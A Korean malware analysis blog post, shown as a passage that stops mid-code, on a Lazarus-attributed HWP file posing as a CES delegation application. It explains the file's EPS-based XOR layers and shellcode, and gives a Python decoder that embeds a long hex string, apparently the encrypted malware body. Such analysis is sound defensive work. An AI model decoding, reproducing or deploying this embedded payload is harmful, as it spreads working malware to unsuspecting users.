Lazarus가 제작하고 유포한 것으로 추정되는 연애심리테스트.xls 악성코드가 발견된지 바로 하루만에, 또 다시 새로운 악성코드가 유포되었다. 문서는 CES 참관단 신청서를 위장하고 있으며 타임스탬프는 2006년 2월 3일 오후 1:48:46분으로 계산된다. 또한, 최종 수정 날은 2019년 10월 21일 07:30:06(UTC)로 나타난다.
이전의 라자루스가 제작했던 HWP 악성코드와 동일하게, Y101 이라는 변수명으로 EPS 가 구성되어있다. EPS 안에는 본파일이 될 헥스값들이 존재하고 특정 헥스값과 XOR 연산을 통해 복호화 하는 방식이다.
특정 XOR은 다음과 같다.
| 0xF6, 0xA4, 0xE6, 0xE8, 0x0xF6, 0xA4, 0xE6, 0xE8, 0x7C, 0x27, 0x63, 0xA2, 0xFD, 0xD3, 0x0F, 0xD4, 0x0A, 0x0A, 0x91, 0x17 |
해당 값으로 XOR 연산을 진행해주면 아래와 같이 또 다른 쉘코드가 등장한다. 쉘코드는 /Y77로 시작하며 해당 코드는 0x60 0xC8로 시작해
PUSHAD
ENTER~
의 어셈블리어를 뜻해 실제로 동작하는 쉘 코드가 나타난다.
하지만 안에서는 또 다시 본체를 숨기는 자체 XOR 인코딩이 이루어져있고, 디코딩 연산을 통해 본체를 복호화 시킨다. 이전의 라자루스 문서에서와도 비슷하게 특이한 XOR 연산을 거치게 된다.
IV(Initial Vector) 와 같이 쓰이는 키가 있고, 이후에는 연산한 값을 IV에 더한 값을 XOR 키로 이용하는 방식이다.
사실 이 부분을 일일히 손으로 해주기 힘들고 귀찮기도 했다. 또한, 이후에도 비슷한 방식을 사용해서 유포된다면 쓸모가 있을까싶어 조잡하고 단순한 코드를 이용했다. 코드는 아래와 같다.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
|
import os
import sys
encrypt_value = "EA51BC1F23C8A9F8B10B2AFCBA0B2A46D50B2AA6D40B2AC6D60B2AAEA27F5A1465AFF6071ACE6AB0B363076F20E19501D3856AEC3532E17C49BAF97C1EB3F97CA0C3F97CF0C38B7C86C33F7D03C4C77DBFC4377E3FC5377E3FC5377E3FC5377E3FC5377E3FC5377E3FC5377E3FC5377E3FC5377E3FC5377E3FC5377E3FC5377E3FC5377E2FC5357F4DC5397F59C5397FA63AC68058C5397F58C5397F58C5397F58C5397F58C5397F58C5397F58C5397F58C5397F58C5397F58C5397F3AC6397FBAC8397FFEC8567F9DC8E77F11C9837FB8C9048054CAA980A8CA4D81A8CA4D81A8CA4D81A8CA4D81A8CA4D81A8CA4D81A8CA4D81A8CA4D81A8CA4D81A8CA4D81A8CA4D81BECA4C814135B17E4235B17EB7CA4E81C7CA4E81C7CA4E81C7CA4EE9B3BE3E9A011090281D0B98B1BAB2065D2A51B4C0C6FA52664AD3C107FF0471A8D239122658DB82C28F562B47A0F9AFE411C81F3A54035005892BE517B9A266F620430006A2ABD206A2ABD206A2ABD206A2ABD206A2ABD206A2ABD206A2ABD206A2ABD206B2ABD3064D542CF94E542CF9B9ABD306B9ABD306B9ABD306B9ABD306B9ABD306B9ABD306B9120CB1281966BF4A5B5777DBE6BD79DB183E7ADB183E7ADB183E7A91186D7A4619E37AE119737B8519257B001ABB7BB91A527C521BCA7CAC1B127DAC1B127DAC1B127DAC1B127DAC1B127DAC1B127DAC1B127DAC1B127DAC1B127DB21B107CC01B147E2BE4EB812CE4EB81D21B147ED21B147ED21B147ED21B142F428B849AE94025C8F9992611B8C76270441FA078B8E05D79B9E09D0C340C63F1B99CF60EBACF82CF30E60643BDEDE9A34271EC00C8788F401F098A31B7F0E1DFCA7EE5DE2B7F315B23E5C614AFE5FE126A1E91EE11ACE35A2997B99CE77D3A38313846C25577BDC3A5F38FCB20C364CBC28084D312C0463BFCD648BCC9141D3725CBCD11861A48CF1B00FAA752B001AF2831FA300925BD46792D994F393B1A9032C39F6F30382DCA4410D206E46EFB22716D5BBEBFD33F09FCB9346581A6B3F56972C79E5573C70DC3D44C4852126A0FE44B8145E48B2FA81913EEC2A500C93CD94029BDAAA3905339F5B32235DE13DD5917541D1886D38F655E9F8BB188FEDDC148461819F55F2ADD228CC50D23CC1514927974AB52C5532F8D04924F4D00E16B79FABD8C7E05C4B2F5EA4C6DFE094C9221842EB0C51A91BC1E22A7C0C4333CE78E5FCF5BB50F463F91BF9FFBFDEF7A7B8E63423F4A2823CDF7A27C75DC1AAD1064FE779EB05C78F6435078063D2D5C22B86E93AEC16FACAE2D5BA0AEAD5BCC8A89C92DBA2EF2313A2E596A0E5B92F79854D719646BD7B32403D773A4D35AF0B8D164F790BF64A19904417166D0ADC9130128122C3686A5323662E91626F9B672765166F13A75A8840269AA8684C3F9D07BB7D9EC06F82D889BF9319010BD1580AB727290E2E266D204F3C1D1C7A3BB2A93677451DC1C03D299F8DF61E17533E4AE5177A744BA8833BD8A25ED423A4CD1C9E7A7B7CFE7C7B2F06C0D8F220129CBFA4A3957DF7E3200DF2D1EAD1CB791A2E61CEA946D5BA14620615964C469376B039667E0CF4DD0750BAD693DB0BA82A335867093158A3D078EC436038AFC4B4882AF789570032C7A24F52D28EE99875B9A7D0CA4B59548D14E4E7166D2AA65685FB57A1CBBAD7B0AA9CD3A429B6C6A4AAF78938ACFA9CCD474C116B5498053A9CFC74033D017DA6559423802A83A4D41BB02089901A2BC599E00CB595EF234DCA10B41685D1449C5D341B922AE9951D8452A29EE618FD99D573F0DA7EDC751CF3B3E520F9D728986589DA858EF12B032DFF6B956DCEFAF5FE3EFA61A0F6A78D0B3FE89951B0241522E4A68CDBCDE7213411F9ACDB4E05B9A9C0CD611C23016D6780EEDEEFBBA3310FC3ACB04EECCCCD49BF49659D6E9D99E16010069E9D2C81401D2775DD0D387CB8389884EEE2120816BFD3A2FF9B6C3E901472CE40B47AC09BB975360279A29565A5ACE35F528BC590BCD4071F832BF8182F7B36A86C40B33D9714508B00EB90DD7691198657A18DF8D49EA56385ABA3F485BCAF2B217148506942AD83023714A17C514C35F5045BD3A2FBB86807FA7646780EF31B7C7AAED370F71F512A05005EAFB1CED09055DED6852F9BE6F8B0447704CBE4C5F43F0DBDA871823E237D96AD161A02BAFCB82DB5BD5221B258DAB8493B95C52C4B89CA2422FC98C8F39B73C07EB3EBCD8B512BAC0BEE58718A83301D929057FA92FC3F60CD4C3B0891414796A7568301C33702AB5BA70AA73D0E623615C43EB8EC14A0B4F4781602163AF33696321BD9174CB8459470B560AF8DB06552E52E3654AA5E4F1A826FAF961D1ACAFEF1E06060F5552599A66CA59306B616D323E99EB8CCEE5310ED1E5324ADD129C03C61C38ACC81C43FCA559FCACE3370339043ABE024415BED68D1EB85CB22FBDC34D2FBDAD1B79EB065BD0F72C63D573A264E97BEDE9AC87D6B7D258D9372AC95472A2B90C78E5C684628CF9531103B4133D8A4F24BE27BFA1484924C0B0DDA424B91DF3174648271C60F70C57C374D76CE3F15D9D61C52A9FE0F5576986B43D960D364FD32D661823985E231B577AA1D964D246946859FDA3929EAE1C6A759B2654012CA2101D31F16654730DADA00E23392187BB3E3957D63E6AA873EFBF8D837A73BA094D746B7A086611BDE7754AC1DEFC9549DCA99664BD0BE24A197A371915903B4E3D3B6A04CF0299353F44C9C04A501D8CB198DE88FD8BAC8588EEA0B2DAF5404364B1B07676B074959E8673655F8DA456A01C1289D75B6324B29F18FFD5B1E3FFD9C6EC85D0AD03EC5CB2CF7B19B4B7F85D4C4A1C4A04992BB4D921DDD26A8CD656ADACF76AA7F7E76087F33638DCB6C4C8CCC2FBC53FD50316BA1577002CC4782CAC62B858A1E7F14975F3018A003C7588F56D1E8C898EDFE689D820A3798EDEB32CA3801595F2FC2FE0712788BF2327E859ED269DBF86786132DA85A4B3DA79D73CD0F8EBC8BABF13CC4F44270CEF87744C3352F0A037B126B3E9C76A23E19270A3F2CA4FA7F20A35678628DD9F642D1DDAAB5904696642DEFD7B821F78BBF6120F7117C4958BD71522CE2EDCF7E2101634511A4539B60CC06ACCD465C12AAF0B1941F7CF52E2C08F640B31D39382442FD0D3A24A26AFDD072D46AFF0C964788D67635765FE3EA30E584A3617D3BDC650ED76525F306068E35A7005C5199BE47D08DF0F7C46DA4C97A19174E94CA676E98E58B5F86541441B867946DC1E877ACD3588030C369803CF4360C2274309C4B3725600B9F183F8087246FFFEF959744605997BCE7061F0977E1CC76DF545FB4D563AA584ABEFD2FBA8FCF150F875B4AA375D10EA7E969D740BA34A2508548BAD43A802F4B7DB54CBCC685EB3D2905FB023192A46CC9E64A6D29E6F34D29E6FBE2D91EA5DD1AEF45E1946BC639997B6BC1C4CC7B89973D8C02E35C84B7D46D175F0A22A854FCDA3CCB75CA7E6CE0A3C7DC2316EF6B5B27E8E184EC34D55E70E262D1FF712E10717EEBD2F0B7D39D8B830B953BAD23AA74AE3D730C0A2253C187A7ABDC997F70C0AE2C7E5EB64C6A1E43230DABE4E431C442C839BCC7FFB2D8B8B703D91A6F38F12330B64694068BD66311BB20C07EFB7D3876AD52C688BF1D6A4B38BA1CB004FD43369FB14942B8858701A4DD5C69438EAA2A5439B2B2EFB744F71E57B9FB29EC528BFE8DC7E349AEA45842E1689D891462E5BA9D3B05BCA1BC45FF9DB789C760AAFF4D74482061869B5A16C6709B2F67E1B4BCABE0DC62C3FCEBB95676A68037F078CCB8063DEC30BABB4D7634C78D873B309888C3ADDD7A036D5A109506078E043E13D03BD4D6513BDAD124BD7A9B27317B1428B27E1158C1B8A52FBD295E7359EEC6C835765240197099DF179EA1D020DAA155B22FB29EC1CEFB6D1B169829DCF06D11E08630AAAE38BD2DF0F687B2DF3209AC505BE9C1561F894982E2CE2FBDF9BACFDE41B5EDF2824D8548981B834D560CC255A66CEE60BFD36B1A4E04301930A80871CCAACDB1447FF33753D029D79767009D78707655E320C869243BF90DBF6B05C0B834AAB9F5A25E6235381BEDD0DD688ED52C909F254834F0AD7556B2D92B570B11C46F2E704CDCEC9DDCC450BDC07470F3FD6FBEFBE1EBE1BC8A041E445AC096F976C61709A6B3ABC6DF67ACDF938F92A00B4BA87F649BA1A3108CF0BBD932F23F9DEDFB8F9E210FBB408ADFB42DEF6B6BE630E4DF9211BCE05AAE3C041E7175DB1F11027B5DE9EA83510DBE5C1AD1BF2EEF72FBDF0F7CF31B4BA3BC6F548C4DBF5524539F55245BA7E444A8641E011F2CAB665BAF77D6EB2428205821C091F86D2C5F49A61DD2059F8A3DE76C80BE0FC3888D6F0862EB68545A8345819356FB812B298C3E26D9674AD6B213FC94D743C262C5A43C7CFFC88F76E43B43E4D157936D75309955332FF5032B1742089BA482DB0B4CD156380CD65F607AAC4C81732066F93720EE6E263853EBA40CF35B2AF25B6CACF3C894115D6EC57AAD974672139FC26D3A9B24B1CD636739738B2BAB09D39BDBE580136445142F718567138FA9B457886D2DE7000B513C1D47420C01B45F84ADAA5710BC83CC0887B7FCB197AF68A14F4491CAE4750DDE6CC93584AA4759CBB5779A23B3E8672657DF332A60A47BDAE8987C94419433A45964F3276698C71B8AA47FDD4AE8B1D4110631E8952D048DED996786990FE0A193F75CA534A715A16490A03F134D7B385AAE7CB855F99DB0E185957549FD9EE102B9C3195571BB1AA572C05EC730196783E95E38BCEE3E7AA1E068816C095CA880DE61AC3D4EB6097966E5461C0FB206A85BE3E03E7AC346A08A71FAB0C3CD3F36C413B8A38A1C042497DFF44CBAF8B4A5E0D8B3E6410FA049D99FD859AAE2600612053EBE0CFA5C7F8C0931901069C1DCFC3D29595C79ED40514621363F21041E047210A1E43584827C8B052A205CF10B012E6133DDC3CD4B19908EB315EBDD391FE991AEE755879FE3E2FD1FFCBF525748FCDD9060BA6691C2BB5AAF6A9ECBFE57B84B5FD0064318C1FCEB18EDE1FC7E5E25C26FD6B63343C6FE7FBC5EC08FAB01C8978CC943BA8FBDE4626FFCF04B5EEEEFD4CDD30BDF07F73B34C60F035146FB90D22AE86DD63668318007978C29D7DFA3BD59F0D02DE48CC852077E1C714032DDF78EB32DF44D6B928FD91CB3785C5BE9B8A474ECC2A48B1F35A094287B59DE968CAA14EBCE500FB005E7E108C6E3E26B6B24AAC88B8B234CAC846070BF12CA648A5B831191D36BB217A3C10A18C96913EA96D863522E4293C527C92347C46F7C08AF67D3E8D72534A7FFA6BB50BF5CAF37910482008FA6317ACA2D854D89A35A28A97250266FEE22E723949CD84C6512D0037BA069CBFB899D494CFA7DD03FA28222C0B691658C37D82A01C82EE9C97689A6CAB185D27DA52A23D1C127978DB6163003800530700E583128305AC2CC5F5D8E3D10A20FCDE200E88E268F0D42B553F2B40ADC562E24B43A67E79C0862D0BCC231383ED23D11E17C00E6BDE4371CFDD67B133B40CDD31FE6735BFD3FC61EC59E63F99AF4034E04744B893448C7E2E6E34A55A88BF9EEC137F5F1C44DE14232083E99717662E841D8083F974E4D0023A80D57D40B9AC7B3D834F078BFBCFFC2189BE0335D4B1EF5BEA088F4979A56561C3F9F705EBFAFEB081FA3C0DEBE832C2C4B3124760896822FDE1EC216940165AFE3884CBA8D43009A9DBFEBC28EA1CB4250411373A2B9736384B49333B8389B943AC37134FB0191F77DC6DE377E31F51744A4A4A7BBCDA7555B91BFD30F24939816C65C60A8CFD0C87C9A156D8D5A358D9D5E2D1C958A4EDD22FBD9CCAFDEF329E448874E5DABC7AE6E2EC281997F00AA0FF07952BFFD0D09FDEDEDADFE79A1AD5E7249B2DA2E896B12CF16FF4F4E36FF704C3351317CBB5DBD08E45D2DE10A61A09EFD3184AC343BFEF2DB86A8442BE79A69BC18185CD48CCD14BBB32B90D6BFE46A5CAFC47C94A7C8E283FF4B5A0D756C9B6D7E016E0C074D302F83E1F1D067952B0F8C7E7ED130E0BF21B26990F6D8CA1EFBB84A993BA643C90715B55D1F8DE611CFD1EB664CA1FC798E3DE3767A4B6C8B4C1F7421041AA56ED18AD2B674EB3CC776776CF778702EFFC68806A3476658B95D165A0931EECA67798849B585B651C0E5BCF162464AF8860A29367C163416F818B696FDF4C1D3297C53884A432345C2856DDE4D427274AC150587211E9D1B15CD8217D6EDAEAF4D4FEBA4E5CBA1E0616CA1BB2E6842AFEC22C65774E69450C0955ED9BD2B1C5109C995DAF65FE7DEBEEB06949F04C92BD7A02A242AFD34B48B8FC4BB039A014EE62999ACEDDEA050D35E1496E397EB3C8AC4CEB23F35BE34C0B6481A2AC1886CAC51B730D91077FB21A487F7FD91E282C8FD75F12458801F7D2C3B8BF6993DC73E544EDC2720E1D9C012294F47EF2EA8F6D87B0B312572A40505D331ED429C6864B40AF554DCE7C142E147D8B879B01D61709B1554B5442EE00D9BEB8E90B0FF8737F713A424277458D3A8EFD377F8E1A32CE4053A97B1E10D6E8E8273F57B278E1AB44CE947061C6F3C0E4BADF10BEC3CCD13EC30C9ACB1AB54788FD389FC9F1C460ABB1C1612BC181EC7FE521DCB61A91A78990052559A7AA494E67F7C563077B324C28F03C27F47D924211F6D3E56C45F0C5265530E2F27DE088820D8C1AFFBA68BB3806559FA9F5F0ADF2BEDE79D25B671FECE0B3F3F0000506F0D032923B5502D0BCBE9919C23E751C2A458C1FAAF205838E521BBCCE1A9A788E9B9C80535F504C2B0A3A1BFCF5E8E257B746A4007FEA4A8A9EBC133EE83D14BEA1BE71C9318DF2DC8BC53DBAAC3D10CE2CBED23FD12685F7A31229EFAB90B5EF6A462059DCDBC05535F1DA95C64F4C125490D997A107DCAB51D8667689657F30A3D3FF2844D0FFA812414AC9A9C63C4C5D3FD745A1BF69D2D4BB21695B33FDFA847CBB0B21FB349F6DBE4F300024C209A1590CF052C397BFA10BF083A90B00706D8EC0890A7AC0951295749B12653328D1566997296792E72A4FE56C0C3873B2A23DB532BD3D06BF032194BF7B9DDC9B5B61DDE39B2C5624DA17689ADD675A0895EC5453738C2C20843A28F67A3FAEF6843F877BC1D85308046BD18B8576E993FDFFADB7DDB7A66055C3727133BC014DC83E42C074581AD981EE100B256662979639D2CBD4B924BE537C6CCBAF8038A4AABFB760F8BADCE01D8D914D454C136D894E632002892B3350328C0BD2ED84002F50EAC2359360DC7D99CC273B92076F4A90B327092A7CFF1C090BCCCCDA7A76D59A34FDDE534C75C55B06FC79B8A6B602A4E26E056D680A214D6E2D7C62265AB43D488A0335FB45DCCCCDDDDF8F32CB59FF7851CFE8369FF0E80B560F3823E93431B4E9B403EAA8EAC2496B4F9A2F3032E71C8E4723D48700A4AD1EC0A465A959DD3920E9FD947A87568E846859E7F97BC6FAF9834F700B440BA2DB71BB851BCE4E8D3FFE1CA5F6168AB508E7FB4ED0AF7E90EFAB3F11EFB3779FBB97B75807FC870EF388978770B99F5CA20E5367854155D3FDA55934D9D959C464D1828CEB5E368833DA1792B31B2C19435AA38960B509BA664626369E0E33882AF57F8215410DC79A16262BD41B748FA4620627278D8AB4274DC34FE8055898BEBE95E17ACD14EECA402BBE2265B83EB220FA3EB254B3B3FE700324927383B4220F4BF545D12AED698897849733DD1D66F458A81C0FA52ADC47D6EC343824EFC482BF248C85B49E2CDAB99A7CED76F4347C34D18496E7190467031B37A79F91AB0340A8D34BC927885B80BC5D445B48DA5416C56FBDE1526CE032A83A90717933FE6936CABF918E4577AA5B03DFEB37EA8AAAE1AD63658345253D1A79E5BE1C81438CF1460E655E21FFC0293CBA41EDB728E9A64AFF627EDD45623E56B8304805B488C120FD4E4DA467255F7DE33458386CD20BAE925FDB996998A642CA627D8C1229EEA6B398105E0CD4109E2ABDB4CDA9D648F931270AF21E285C4CE87353A405736B3463BE3D4D34F748E8DDE0AAFA21F195ADA86E23192048444D3E6995D4D43CBB1D633686CE9B8E01105CB63F1644B3779F31F46027B1FA70EEB08A76A67DE23279955EB48566263AE41A118D6FA766E5F32069F6B223FF7F260B763A716406CD7D75AE1D161B04E961A67B02F12184D3B4024D97BF096938FAE2B10BD636FB205DD8046B2D9213C42864EC517D64F359C947877DF1C254B720B9BE77674E08B02FDB2360E7500359B342BC653B8BBC211AFF9891A3AA4F9DD0ADD89B26425DA3A75D5DE82C1832B8BFF66B7948263AF179CC7D4DA487597683679206CB22E1CF42E821E01C7C6CEFD4F72BCBCC4F956728702AD287385F25AF3D9FD9ABFC20E6B32155C29364A6C3965508E0CAD203CF15B7AC55293757FDA94857B6883C7366863136E95AC78C0AA59281D5291D9E987F18D629B0DDB3EACBE2337150E24B791E6E068676139378869CC0A003DC792243565680DE265D3A29F7E53C99F815C28C375DB7DE80DB076A48AC0CDF15692029A1F48FA1307E16CCEEF46E8B233C389E1131FC935905741CA6C35D279998426391240A2728EB9BF6B922EB737282EF5572462FDC4D1DC49A4EAB55666AA018AD6756EEE339EF1083BA0F590874F00CE9BAF9E67E71440654C7C20720DE857C079FEA57DFA5EA2CD9ED9F02A4124BD4AD7150FDB08999B5394FD1C4F980E2C60160BC875F231F4903FCC11478CE326A36469657CE10AEF4EAB8E653B3EC470A725A00319844D8BE893CD3EF460F0C225E6FCC04197CBE19E909DE0E310B1FCF0850EFFA8A1584FDA2159CFD32122A0D015D646331852D333448D9C246530AC5BAAC358EC98B828A0D5E1D18C5E1DEF42A26A306DCDB7F138490C4C06C22047C91640EB622A458C2F50D7217766D871D3C468411BDDE6B90F55D7912708A369EB1A28DA045339761312A7F10B94C7F9B3C8C0B1476863CC2A29EBC13E21B7C67F0DCADBB2663F6BC466406F5CDAE47FA0503814D2EA359C56C080A91073C8E415F3E0AA11E1FD2FCE1C38B5EA904D393617EDD58563893FA98384AC2994D8F7CFAFC93F1BE01D6F63FFE297E307F158A1E3A668AEBC2DE8B13CB1E4F200BDD830E080E73C6851ECC5BD584ED8B8DC1ED4B1A47A16FBABF736ABA3F01B4CE1241B963497129889571A9EA5605B6BCDBAAEC1C0C77EF5CCCFD2F28DDB5229DF965D4190066246E8F22003F64A87B7F322EBF1700FC776342B50E2B430E99A443C610447C9EABDD5C56C85CA12E85A59125401DA9BE7A2EADBE7A02AD7F3B11F17B3EE5FD07CAE6010877190E0887A39A00CEA6ED189433D555178FAFE6FC077938E95DFC619900BA9AD6AD035AD3930876A21CB8BDE5C9CAC20F0CA7EF4CE546844E79A2651A73B09CE5FE9D2CCAD5A9AD30DCC68C00C3D593913FEFF88877CC33CCC513F019211C403A786BDBFBCAAD3313AD6FC517383846D138FDCD06495A8C33F2A0434033E9D006B76F26893214586AC3A32DC8183C8AF1603CEAB9EB50CE29A4237A6D2C7C0811685CCDA1F9C0F521B27199655ACAEB117EEABC982AAB175B856ACF13AA81CFEB27B023308E0AB3C48907C820EE1C2FB0BD97C7F85EED2B731CC5C3835D16AC80A05EA5FA7E0FBA86CAAFC486DD29C4861DCF3389986ABB95A2FF74DDA1326CC9A1CC6DBD223425B8F5CA324AF5D43AC1B9C4B1D2C0258951EE8C1D2C2782AC9A9E5224F4A8E1E88C7067726DF850C20EBDA2DB679399680B2C966F134DE4E45774F8B8DCCAC120AAF9E11029318AA7BC848E605505D9ED6B28907AA46521A87B89F01AFEB5F4DEF77F8819FF3607A1DB81946E2B5B107863DEF4F0C3A873860779CCF4806D847372AA440FCDBEE1CFDE3BB5301FBCADCA614232D59DC0C4DA0909606E5DAA11FB5EFA5AA744A314D3F077CDAB7BB32D6D247D702C873CD0F1F47324C1B200F4CA072437AE0C029F6E9FC3DE3C9CAAD1F42965234CD2978F8264D3510B3C68181AF0E5DB6C41C113F9578DA50257ED6681EF5968860FA21C853C621DC1C9B3EBF91DDA520062E26737D49424ECECEE5D98C8FE0A299313949A48A35E2526B1A8A3B18AEAA509ECEA35C8B54E66CFAE918A0F2FE607403FBE9CAE7E87A74E81F7E6F681C7E8060976B94E863009B14E8AE00A5E43785CE8D6BE29CE90B596001852AC215A62B855D13210D268FB949BCAFCA41B2B021253A2BBAB2C3F8B8329FF784A7A8BC67C32009F65869D60C1EE0863E9EE00EFBEFED9E0F7BDCDB67481C2203B3941ABC81239B0FE2C4AA4BF2506317739C0D8CF3EA1EB8ACB7FF0FCB77C08FC0F084FECC28302249564613B92D3600BE73A1E5FACBCDF5FD3351C1758158797162DB3F39E79BF3FFE267CF77684A617C1BCCB33C9E8447ABC553D3D691E4251B5D6CF700FF62E08B31FF10E34E0BE8577F072143BD4DA6E4F5FEA2FF2620CAF0C2B87474DA420EF5AFBC55F37B2DAA7F2CF18A82883291DC3591D5EA2EA96C660D6210064AB360C7AABF303CDFAFD5EBC8803EB783E89F704F91A43DA3A5CC02C83B7CBED8F883205918B55D72D6B94553D24D7EEFE753FEF7361F751074D8280AE5A8C24D15518E4529321EA10A560CF4D9C722F6EDF33202A1A30C4B1E5397D70A47EAB736341D0766EF8578671FA58C3B0799CCD8B5D61D2EB9225136856A22A2FA6AD4CBFE26C08341A2F9EF034B9E18528BAE185ACFD6AC1732529C5CFD6F0528E460CA2515C00585BEA6993ED612563359DC4F0E520E2D644283C976DEEF1953DCA599D6D57D127821E27EF9FD5967B4F160D37E4A2BE894430BF09B87CB0BEE9788FFBFB8A8DD9046B6E6971C8B5323DF0B5C23DBB3EAE195B09ACA5BBC8ED64E28B4C3944CFA389F30E08D84914AFAE605FBB1E9A1632CE94E027AC98B8A4E0A8B1FB10AAF8AB55ACFC3E43C9B44B6F34254C6F36EDC72726A45EFF678F60FF67EFE93EA423218078F439EC5F4CB53577FE363A777A08B0A4CD02F35DAFE9FC61B5D276BEFE593D8F16B43A1019C27C9BF585F7AF120CFACF1CAAC444E40DC5A4EA6D2EA6D9ADF824D90EA3E92E821B6B676E9840B852D62F694C5E2E8A6E9EF7CB769F34074AAC7A1012CA32A8D4C38A23971B43BD590B1B3458631207423BADC955F32488A4C0FBC70B86509010EA77689C2BCE24D5ED365D34F1389D0F7AF3D50CB824BD5ABFC58D9777654F140CFD47EC12FE5769C08A5CFAB0787F773C773784FD44F44A3E863786889C0C5F81FB8428189384E09314BDB82AAC9D797A0C891CCA0531FAAA193A046E91C34CE5F52B0172B76BD40FC8256D5F79FEF48D0D87BBBAA6570DDF77A4CB94E4DC5BAA14DD1E2FCFA9C46EFFE65D38BA3B8CB7F2367106304BF171A4D9B06128A1FAEAF461F83D05A2B64238B087C55FF08A39B98CE46132EB222847FDA0FB5FB4B502B463453EC0702FF7D4510A34006E2339FE8E887C3FBB023ABCE49902B7FBE10F3C17A734FA630CCFD6F985825D016727A40DF225D7ED03FAE75A77A0C342CFD36057EFABF3E3CB034C8768777CD6CF36221B64F1C694CC15A0E331DCC5F0A497DA392DF211757EB0224F3ECBCD58B3D46CD2FBA2AF0DF87ABBCCBEF97B2809747A81094475588D898E1212E08ED7FCB715D789255AF3BBC36842B4DF7D0C3B1D3C0F035ECAFE3CA135013D62F9CDF1E9432E8A0819A1C222157C1FFAA99388BE277A85B5F2319E08E9EDE10AD7F1952C69FDEB3981D7EBC6AE991C869B91F31ED0590C21DC6786D36A97A9A293A66FBE7C6CF46C09BAB59F4C4ADE2F4FB4E10EBFF5171B6FE18DE46F0DE6CA1B30B169DF9D8186EAD2BB98D02EB7146F50F9AE6E2A3ADB80017BE029EDBA25653DF0E5FD7CE2DF480A259B8B78DD290A01DB2D7924262FF4361ED0347E15EFF054E96506BB6DB9725CED037DD6E23B82D771BAF818F06C335938C4BF987C9C3CF6AB58C916E0EB0754732AD6DE84ACD920609D98A04FDD6E91EED230D818CCB324274D436512C68B71B627D47D82155E9AB41262DBC9EFE01C4BC4A3637453CB5D30E9231B3F3F36697EB00765693E898996FF79C8607455DC9674A9E27258DDDFCDDB26F70EE866E36646E23DFC77A4382F0328075AE9180C9BA5B3D058BDC0C428420AA022BECEADF3CB21E578F201C5BE3749E6F3FFD73E7FD49F45525E0602D98C0A0114FCB9DFE274A9CEA47B10B4BE91D0B16DE1D0F81AC9A405D44CE68502066CB80EA5B2F85D8DB8FE6EDF3042909ECABBBF55CC7F4AD4D3FC8229533B3E99D975416DEDC08886E88B8AA0327392114A356C1C40DB24E1A856E4F5A67D5840337C1BCABB4FE62B341FDA688793172693E8E03FFBE0B8B68C1871411439D419685177D1F34ED7E1F38EA105101A5B2D00DFA352166D2265742651AD6F7C99B28F3893B1E89A1CC2F1352128FE39E382F224456A7E588EDA7C66B0E5ADD1C4D1026F9F86204F2048556FF30D664F714DFC34BD081AC24192E492CA426FD632A0385AC0647E20549782A96657C72022DA2809FE03C488484064320C65BEF007CD64212B1F28B80FBB91F6028636C158E3ADCE62F30A8B95FD94145AC6D0177BC8DA17BC8DD51D420DEAE60716E7E8872830ADA03ABE2EAFFDFB1DBC01046205443B6B894643945E0EC827067118FB451181A45629CAEDDD72D2A46AF7C27FE68C2AC97391760A4F1D00D074955A6018814A3A68BD4EA23D7CD993963664FF49C76600264C973349EBA9C92DAAA2E8B553CDB4CA922C55826FB8B1DE94C6BD584D90AAFCD969F2EB1996FC1320E451EDEFBFDE1DE7F31A2208C00E50B925E3E0BDD528BEB6F287BC30FD6DC7F3C265F8BB4F2D231B978A0F7B2712507B0F9F9B84591ADB0E446D51BAAC2120C963510B31845DE9090FAFBA04A48B1A5ECE1F1BA1077442D6D4AF53A0AF7B5CE53BBCEF88A067A093D86709188347C0955FA09B22EC8052BFF0A03BFEA87D07"
key = [0xea, 0x5e, 0xad, 0x00]
mulkey = 0xea5ead00
tmp = ""
count = 0
real_value = list()
key_count = 3
for i in range(0, len(encrypt_value)):
tmp += encrypt_value[i]
count += 1
if(count == 2):
tmp = "0x"+tmp
tmp = int(tmp, 16)
real_value.append("%02X" % (tmp ^ key[key_count]))
key[key_count] = int("0x%02X" % (tmp ^ key[key_count]), 16)
key_count -= 1
if(key_count == -1):
test = int("0x" + "%02X" % int(key[0]) + "%02X" % int(key[1]) + "%02X" % int(key[2]) + "%02X" % int(key[3]), 16)
mulkey += test
if(mulkey > 0x100000000):
mulkey = mulkey - 0x100000000
if(mulkey < 0x100000):
mulkey = hex(mulkey)
key[0] = int("0x" + "0" + "0", 16)
key[1] = int("0x" + "0" + mulkey[2], 16)
key[2] = int("0x" + mulkey[3] + mulkey[4], 16)
key[3] = int("0x" + mulkey[5] + mulkey[6], 16)
mulkey = mulkey.replace("0x", "")
mulkey = int(mulkey, 16)
key_count = 3
count = 0
tmp = ""
continue
elif(mulkey < 0x1000000):
mulkey = hex(mulkey)
key[0] = int("0x" + "0" + "0", 16)
key[1] = int("0x" + mulkey[2] + mulkey[3], 16)
key[2] = int("0x" + mulkey[4] + mulkey[5], 16)
key[3] = int("0x" + mulkey[6] + mulkey[7], 16)
mulkey = mulkey.replace("0x", "")
mulkey = int(mulkey, 16)
key_count = 3
count = 0
tmp = ""
continue
elif(mulkey < 0x10000000):
mulkey = hex(mulkey)
key[0] = int("0x" + "0" + mulkey[2], 16)
key[1] = int("0x" + mulkey[3] + mulkey[4], 16)
key[2] = int("0x" + mulkey[5] + mulkey[6], 16)
key[3] = int("0x" + mulkey[7] + mulkey[8], 16)
mulkey = mulkey.replace("0x", "")
mulkey = int(mulkey, 16)
key_count = 3
count = 0
tmp = ""
continue
else:
mulkey = hex(mulkey)
key[0] = int("0x" + mulkey[2] + mulkey[3], 16)
key[1] = int("0x" + mulkey[4] + mulkey[5], 16)
key[2] = int("0x" + mulkey[6] + mulkey[7], 16)
key[3] = int("0x" + mulkey[8] + mulkey[9], 16)
mulkey = mulkey.replace("0x", "")
mulkey = int(mulkey, 16)
key_count = 3
count = 0
tmp = ""
continue
if(mulkey < 0x100000):
mulkey = hex(mulkey)
key[0] = int("0x" + "0" + "0", 16)
key[1] = int("0x" + "0" + mulkey[2], 16)
key[2] = int("0x" + mulkey[3] + mulkey[4], 16)
